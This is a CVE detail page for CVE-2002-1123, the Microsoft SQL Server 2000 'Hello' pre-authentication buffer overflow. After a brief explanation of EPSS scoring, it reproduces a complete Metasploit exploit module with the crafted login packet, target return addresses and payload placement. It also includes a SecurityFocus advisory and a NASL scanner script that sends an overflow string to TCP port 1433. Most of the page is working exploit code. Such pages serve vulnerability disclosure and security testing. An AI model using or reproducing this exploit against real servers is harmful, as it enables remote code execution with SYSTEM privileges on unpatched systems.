CVE-2002-1123 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # $Id: ms02_056_hello.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server Hello Overflow', 'Description' => %q{ By sending malformed data to TCP port 1433, an unauthenticated remote attacker could overflow a buffer and possibly execute code on the server with SYSTEM level privileges. This module should work against any vulnerable SQL Server 2000 or MSDE install (< SP3). }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2002-1123'], [ 'OSVDB', '10132'], [ 'BID', '5411'], [ 'MSB', 'MS02-056'], ], 'Privileged' => true, 'Payload' => { 'Space' => 512, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets' => [ [ 'MSSQL 2000 / MSDE <= SP2', { 'Platform' => 'win', 'Rets' => [0x42b68aba, 0x42d01e50], }, ], ], 'Platform' => 'win', 'DisclosureDate' => 'Aug 5 2002', 'DefaultTarget' => 0)) end def check info = mssql_ping if (info['ServerName']) print_status("SQL Server Information:") info.each_pair { |k,v| print_status(" #{k + (" " * (15-k.length))} = #{v}") } return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit connect buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" + "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" + "\x10\x00\x00\x00" + rand_text_english(528, payload_badchars) + "\x1B\xA5\xEE\x34" + rand_text_english(4, payload_badchars) + [ target['Rets'][0] ].pack('V') + [ target['Rets'][1], target['Rets'][1] ].pack('VV') + '3333' + [ target['Rets'][1], target['Rets'][1] ].pack('VV') + rand_text_english(88, payload_badchars) + payload.encoded + "\x00\x24\x01\x00\x00" sock.put(buf) handler disconnect end end

source: https://www.securityfocus.com/bid/5411/info A vulnerability has been discovered in Microsoft SQL Server that could make it possible for remote attackers to gain access to target hosts. It is possible for an attacker to cause a buffer overflow condition on the vulnerable SQL server with a malformed login request. This may allow a remote attacker to execute arbitrary code as the SQL Server process. This vulnerability reportedly occurs even before authentication can proceed. ## # # this script tests for the "You had me at hello" overflow # in MSSQL (tcp/1433) # Copyright Dave Aitel (2002) # Bug found by: Dave Aitel (2002) # ## #TODO: #techically we should also go to the UDP 1434 resolver service #and get any additional ports!!! if(description) { script_id(11067); # script_cve_id("CVE-2000-0402"); script_version ("$Revision: 0.1 $"); name["english"] = "Microsoft SQL Server Hello Overflow"; script_name(english:name["english"]); desc["english"] = " The remote MS SQL server is vulnerable to the Hello overflow. An attacker may use this flaw to execute commands against the remote host as LOCAL/SYSTEM, as well as read your database content. Solution : disable this service (Microsoft SQL Server). Risk factor : High"; script_description(english:desc["english"]); summary["english"] = "Microsoft SQL Server Hello Overflow"; script_summary(english:summary["english"]); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel"); family["english"] = "Windows"; script_family(english:family["english"]); script_require_ports(1433); exit(0); } # # The script code starts here # #taken from mssql.spk pkt_hdr = raw_string( 0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b ,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02 ,0x10 ,0x00 ,0x00 ,0x00 ); #taken from mssql.spk pkt_tail = raw_string ( 0x00 ,0x24 ,0x01 ,0x00 ,0x00 ); #techically we should also go to the UDP 1434 resolver service #and get any additional ports!!! port = 1433; found = 0; report = "The SQL Server is vulnerable to the Hello overflow. An attacker may use this flaw to execute commands against the remote host as LOCAL/SYSTEM, as well as read your database content. Solution : disable this service (Microsoft SQL Server). Risk factor : High"; if(get_port_state(port)) { soc = open_sock_tcp(port); if(soc) { #uncomment this to see what normally happens #attack_string="MSSQLServer"; #uncomment next line to actually test for overflow attack_string=crap(560); # this creates a variable called sql_packet sql_packet = pkt_hdr+attack_string+pkt_tail; send(socket:soc, data:sql_packet); r = recv(socket:soc, length:4096); close(soc); display ("Result:",r,"\n"); if(!r) { display("Security Hole in MSSQL\n"); security_hole(port:port, data:report); } } }